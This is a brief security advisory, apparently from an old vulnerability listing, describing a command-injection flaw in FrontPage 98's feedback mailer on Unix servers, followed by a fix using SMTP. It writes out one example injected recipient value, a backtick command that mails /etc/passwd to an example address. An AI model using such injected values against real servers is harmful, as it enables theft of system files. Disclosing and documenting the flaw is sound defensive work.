|
Vulnerability Front Page 98 Affected *NIX with FP Description Markus Stumpf found following. He noticed another weakness which is still present at least in FP98 with the version id: FPVersion="3.0.2.1330" When installing a server for Frontpage it creates a file (usually) /usr/local/frontpage/www.example.com:80.cnf. In order to get the feedback bot working for sending feedback via eMail you can define within this file: SendmailCommand:/usr/sbin/sendmail %r The "%r" above is substituted with the recipients email address(es). With this setting you are vulnerable, as creating a feedback page with a recipient address of e.g. `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd` will execute the command /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd` and send the password file to nobody@example.com. Solution To avoid this tell Frontpage to use the SMTP protocol to send emails by using SMTPHost:mail.example.com and you may probably also use MailSender:webmaster@example.com